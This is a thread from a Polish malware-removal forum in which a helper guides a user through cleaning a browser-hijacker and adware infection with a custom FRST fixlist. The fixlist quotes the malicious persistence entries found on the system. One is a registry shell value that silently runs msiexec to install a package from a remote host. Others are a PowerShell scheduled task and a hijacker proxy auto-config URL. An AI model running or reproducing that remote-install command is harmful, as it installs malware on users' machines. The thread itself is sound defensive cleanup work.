Skocz do zawartości

Złośliwe oprogramowanie - Hijackery, Luckysite, Luckystrike


Rekomendowane odpowiedzi

Witam serdecznie, 

 

Jestem nowym użytkownikiem forum, założyłem konto aby uzyskać pomoc w sprawie złośliwego oprogramowania.

Ostatnio mój sprzęt został zainfekowany złośliwym oprogramowaniem, które w sposób nieuprawniony i bez mojej wiedzy dokonuje zmian w wyborze strony startowej, wyszukiwarki czy używanej przeglądarki.

Złośliwe oprogramowanie jest w stanie w sposób samodzielny zainstalować przeglądarki Google Chrome czy Mozilla Firefox, pomimo, iż zostały przeze mnie usunięte korzystając z opcji dostępnych w Panelu Sterowania.

Lista stron, które mi się pojawiają po uruchomieniu np. Google Chrome:

-LuckySite

-LuckyStrike

-Launchpage.org

 

Wyszukiwarki:

- httXX://search3.ozipcompression.com

- httXX://nova.rambler.ru

- dużo reklam przy korzystaniu z google http://scr.hu/3hh1/ar5kl

 

Do tej pory starałem się używać darmowego oprogramowania,które miało pomóc usunąć złośliwe wirusy oraz jednego płatnego, do którego licencję zakupiłem. Użyte zostały

- CCleaner

- AwdCleaner (po tym, miałem spokój przez 4 dni)

- Malwarebytes

- Plumbytes Anti-malware (pełna, płatna wersja)

 

Miałem wyłączony program antywirusowy przez jakiś czas. Podejrzewam, że mogłem zainfekować komputer instalując rozszerzenia do Google Chrome takie jak adblock czy ghostery, które mialy mi pomóc w zwalczaniu reklam i spamu.

 

Screeny z Plumbytes Anti-malware

 
Program wykrywa zagrożenia, ale ich NIE USUWA. Po restarcie komputera, ponownym skanowaniu dalej są wykrywane te same złośliwe oprogramowania.
 
Załączono logi z GMER oraz FRST. Znajomy w virtuala, również skarżył się, że został zainfekowany tym samym. Nasze komputery nie mialy bezpośredniego kontaktu (w sensie przekładanie pendrive z jednego urządzenia do drugiego)
 
Do tej pory nie szukałem pomocy na innych forach. Chciałbym uniknąć formatowanie komputera, mnóstwo ważnych dokumentów do pracy (zresztą boje się, ze przy przerzucaniu z komputera na dysk i w drugą stronę mogę również przenieść te wirusy)

GMER Log.txt

FRST.txt

Addition.txt

Shortcut.txt

Edytowane przez Rucek
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Nie będę ukrywać, że system jest w stanie agonalnym. Masa infekcji adware / PUP. Zainfekowany został nie tylko system, a również i router (ustawione zostały litewskie adresy - KLIK). Przypuszczalnie na kązdym urządzeniu w tej sieci mogą dziać się różne anomalia w postaci wyskakujących reklam.

 

Sfałszowane też zostały przeglądarki Mozilla FireFox oraz Google Chrome. O skrótach i innych modyfikacjach już nie wspominam. Postaram się to doprowadzić do porządku, ale uprzedzam: łatwo nie będzie. 

 

Lektura obowiązkowa, jak nie przeczytasz to grasz nie fair: KLIK. Znajomość zweryfikuję po tym czy pojawisz się w tym dziale z nowymi problemami :P 

 

1. Zaloguj się do routera:

  • Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4
  • Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK.
Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony:

 

2. Przez panel sterowania odinstaluj:

  • Kontrowersyjne oprogramowanie, nierekomendowane: Plumbytes Anti-malware.
3. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
Task: {21CCB704-AB01-427E-B904-3590081354CD} - \SystemToolsDailyTest -> Brak pliku 
Task: {671B90D7-2821-4376-85F7-7D3B5FE6EACA} - \Milimili -> Brak pliku 
Task: {67E32AC8-0D22-4518-BD83-6999DE3BD7AC} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
ShortcutWithArgument: C:\Users\Kris\Desktop\Software\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKGKjdhx1sXu8CuYCS%2BMYEvNgv7FP7Xd2TZZRXRwYgKOyPaM9Tqsu%2FMvPi8wooPyk%3Dhoi
Winlogon\Notify\igfxcui: 
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Run: [background_fault] => C:\Users\Kris\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) 
C:\Users\Kris\AppData\Local\background_fault\aswRD.exe
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjwdRkJSM8NLOThLNjJWMWH5MjFxMdw3RWLLRTEyRq== /q
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\Explorer: [] 
\HKU\S-1-5-18\...\RunOnce: [panda4_2dn] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_2dn" /f
HKU\S-1-5-18\...\RunOnce: [panda] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f
HKU\S-1-5-18\...\RunOnce: [panda_XP] => reg.exe delete "HKCU\Software\panda" /f
IFEO\DisplaySwitch.exe: [Debugger] 
GroupPolicy-x32: Ograniczenia 
GroupPolicyScripts-x32: Ograniczenia 
AutoConfigURL: [s-1-5-21-3990190956-98265678-2498883457-1001] => hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844
ManualProxies: 0hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Zoohair
RemoveDirectory: C:\Users\Kris\AppData\Local\Zoohair
R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego]
R2 Kitty; C:\Users\Kris\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] 
R2 SNARE; C:\Users\Kris\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 MBAMChameleon; \SystemRoot\system32\drivers\MBAMChameleon.sys [X]
U2 McMPFSvc; Brak ImagePath
S3 OATool; \??\C:\Users\ADMINI~1\AppData\Local\Temp\OAToolx64.sys [X] 
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Kris\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Kris\AppData\Local\Firefox
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
FirewallRules: [{C1AAC7C0-CFC0-476B-9704-8C4E1786E18C}] => (Allow) C:\Program Files (x86)\Zoohair\Application\chrome.exe
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Kris\AppData\Local\Mozilla
C:\Users\Kris\AppData\Roaming\Mozilla
C:\Users\Kris\AppData\Roaming\Profiles
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\Kris\AppData\Local
CMD: dir /a C:\Users\Kris\AppData\LocalLow
CMD: dir /a C:\Users\Kris\AppData\Roaming
CMD: ipconfig /flushdns
RemoveProxy:
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
  • Ustaw tą przeglądarkę jako domyślną, by cofnąć modyfikacje infekcji. 
4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 

 

5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

zoohair;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Witaj serdecznie,

 

Litewskie dane sa dlatego, ze przebywam obecnie na Litwie.. Przepraszam, ze nie uwzglednilem tego w 1 poscie, nie sadzilem ze to wazne..

 

Czy po tej informacji procedura jest taka sama?

Edytowane przez Miszel03
Kasuję zbędne formatowanie z posta. //Miszel03
Odnośnik do komentarza

Gdy odpalam FRST wyskakuje mi taki błąd:

 

 
Kliknąłem OK i wyskoczyło Failed to Update
 
Zapisałem skrypt w notatniku, dałem napraw... dział skrypt prawie 12h i nic.. mielił i mielił, plik fixlog przestał być modyfkowany kilkanascie minut po uruchomieniu, niemniej zostawiłem to na noc.. rano wyłączyłem, uznałem, że coś się "zacięło".. Przeskanowane jeszcze raz, logi zamieszczone..
 
Powinienem zostawić to na dłużej? Restart nie nastąpił.. może to przez błąd podczas uruchamiania?

Addition.txt

FRST.txt

Shortcut.txt

Fixlog.txt

AdwCleanerS1.txt

SearchReg.txt

Malware.txt

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...